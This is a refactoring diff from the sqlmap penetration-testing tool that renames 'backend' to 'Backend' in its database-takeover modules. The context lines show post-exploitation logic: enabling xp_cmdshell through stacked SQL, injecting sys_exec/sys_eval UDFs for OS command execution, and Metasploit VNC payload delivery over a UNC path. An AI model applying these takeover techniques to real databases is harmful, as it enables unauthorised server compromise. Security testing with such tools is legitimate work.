refactoring (class names should always be Capital cased)

lib/takeover/abstraction.py

@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
 """
 
 from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
@@ -41,10 +41,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
             self.webBackdoorRunCmd(cmd)
 
-        elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+        elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
             self.udfExecCmd(cmd, silent=silent)
 
-        elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+        elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
             self.xpCmdshellExecCmd(cmd, silent=silent)
 
         else:
@@ -55,10 +55,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
             return self.webBackdoorRunCmd(cmd)
 
-        elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+        elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
             return self.udfEvalCmd(cmd, first, last)
 
-        elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+        elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
             return self.xpCmdshellEvalCmd(cmd, first, last)
 
         else:
@@ -93,13 +93,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
             logger.info(infoMsg)
 
         else:
-            if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
                 infoMsg  = "going to use injected sys_eval and sys_exec "
                 infoMsg += "user-defined functions for operating system "
                 infoMsg += "command execution"
                 logger.info(infoMsg)
 
-            elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+            elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
                 infoMsg  = "going to use xp_cmdshell extended procedure for "
                 infoMsg += "operating system command execution"
                 logger.info(infoMsg)
@@ -151,9 +151,9 @@ class Abstraction(Web, UDF, xp_cmdshell):
                 warnMsg += "the session user is not a database administrator"
                 logger.warn(warnMsg)
 
-            if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
                 self.udfInjectSys()
-            elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+            elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
                 if mandatory:
                     self.xpCmdshellInit()
             else:

lib/takeover/metasploit.py

@@ -19,7 +19,7 @@ from subprocess import PIPE
 from subprocess import Popen as execute
 
 from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
 from lib.core.common import getUnicode
@@ -187,13 +187,13 @@ class Metasploit:
         if __payloadStr == "windows/vncinject":
             choose = False
 
-            if backend.getIdentifiedDbms() == DBMS.MYSQL:
+            if Backend.getIdentifiedDbms() == DBMS.MYSQL:
                 debugMsg  = "by default MySQL on Windows runs as SYSTEM "
                 debugMsg += "user, it is likely that the the VNC "
                 debugMsg += "injection will be successful"
                 logger.debug(debugMsg)
 
-            elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+            elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
                 choose = True
 
                 warnMsg  = "by default PostgreSQL on Windows runs as "
@@ -201,12 +201,12 @@ class Metasploit:
                 warnMsg += "injection will be successful"
                 logger.warn(warnMsg)
 
-            elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+            elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
                 choose = True
 
                 warnMsg  = "it is unlikely that the VNC injection will be "
                 warnMsg += "successful because usually Microsoft SQL Server "
-                warnMsg += "%s runs as Network Service " % backend.getVersion()
+                warnMsg += "%s runs as Network Service " % Backend.getVersion()
                 warnMsg += "or the Administrator is not logged in"
                 logger.warn(warnMsg)
 
@@ -230,12 +230,12 @@ class Metasploit:
                         break
 
                     elif choice == "1":
-                        if backend.getIdentifiedDbms() == DBMS.PGSQL:
+                        if Backend.getIdentifiedDbms() == DBMS.PGSQL:
                             logger.warn("beware that the VNC injection might not work")
 
                             break
 
-                        elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+                        elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
                             break
 
                     elif not choice.isdigit():
@@ -555,7 +555,7 @@ class Metasploit:
             # This is useful for sqlmap because on PostgreSQL it is not
             # possible to write files bigger than 8192 bytes abusing the
             # lo_export() feature implemented in sqlmap.
-            if backend.getIdentifiedDbms() == DBMS.PGSQL:
+            if Backend.getIdentifiedDbms() == DBMS.PGSQL:
                 self.__fileFormat = "exe-small"
             else:
                 self.__fileFormat = "exe"
@@ -657,7 +657,7 @@ class Metasploit:
         self.__forgeMsfConsoleResource()
         self.__forgeMsfConsoleCmd()
 
-        if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+        if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
             self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
         else:
             self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)

lib/takeover/udf.py

@@ -11,7 +11,7 @@ import os
 
 from lib.core.agent import agent
 from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
@@ -51,7 +51,7 @@ class UDF:
     def __checkExistUdf(self, udf):
         logger.info("checking if UDF '%s' already exist" % udf)
 
-        query  = agent.forgeCaseStatement(queries[backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
+        query  = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
         exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2)
 
         if exists == "1":
@@ -104,7 +104,7 @@ class UDF:
         return output
 
     def udfCheckNeeded(self):
-        if ( not conf.rFile or ( conf.rFile and backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
+        if ( not conf.rFile or ( conf.rFile and Backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
             self.sysUdfs.pop("sys_fileread")
 
         if not conf.osPwn:
@@ -143,9 +143,9 @@ class UDF:
             if udf in self.udfToCreate and udf not in self.createdUdf:
                 self.udfCreateFromSharedLib(udf, inpRet)
 
-        if backend.getIdentifiedDbms() == DBMS.MYSQL:
+        if Backend.getIdentifiedDbms() == DBMS.MYSQL:
             supportTblType = "longtext"
-        elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+        elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
             supportTblType = "text"
 
         self.udfCreateSupportTbl(supportTblType)
@@ -156,8 +156,8 @@ class UDF:
         self.udfInjectCore(self.sysUdfs)
 
     def udfInjectCustom(self):
-        if backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
-            errMsg = "UDF injection feature is not yet implemented on %s" % backend.getIdentifiedDbms()
+        if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
+            errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms()
             raise sqlmapUnsupportedFeatureException(errMsg)
 
         if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
@@ -236,9 +236,9 @@ class UDF:
                 else:
                     logger.warn("you need to specify the name of the UDF")
 
-            if backend.getIdentifiedDbms() == DBMS.MYSQL:
+            if Backend.getIdentifiedDbms() == DBMS.MYSQL:
                 defaultType = "string"
-            elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+            elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
                 defaultType = "text"
 
             self.udfs[udfName]["input"] = []

lib/takeover/xp_cmdshell.py

@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.common import backend
+from lib.core.common import Backend
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import wasLastRequestDelayed
@@ -30,7 +30,7 @@ class xp_cmdshell:
     def __xpCmdshellCreate(self):
         cmd = ""
 
-        if backend.isVersionWithin(("2005", "2008")):
+        if Backend.isVersionWithin(("2005", "2008")):
             logger.debug("activating sp_OACreate")
 
             cmd += "EXEC master..sp_configure 'show advanced options', 1; "
@@ -49,7 +49,7 @@ class xp_cmdshell:
         cmd += "EXEC sp_OADestroy @ID'; "
         cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
 
-        if backend.isVersionWithin(("2005", "2008")):
+        if Backend.isVersionWithin(("2005", "2008")):
             cmd += " RECONFIGURE WITH OVERRIDE;"
 
         inject.goStacked(cmd)
@@ -81,7 +81,7 @@ class xp_cmdshell:
         return cmd
 
     def __xpCmdshellConfigure(self, mode):
-        if backend.isVersionWithin(("2005", "2008")):
+        if Backend.isVersionWithin(("2005", "2008")):
             cmd = self.__xpCmdshellConfigure2005(mode)
         else:
             cmd = self.__xpCmdshellConfigure2000(mode)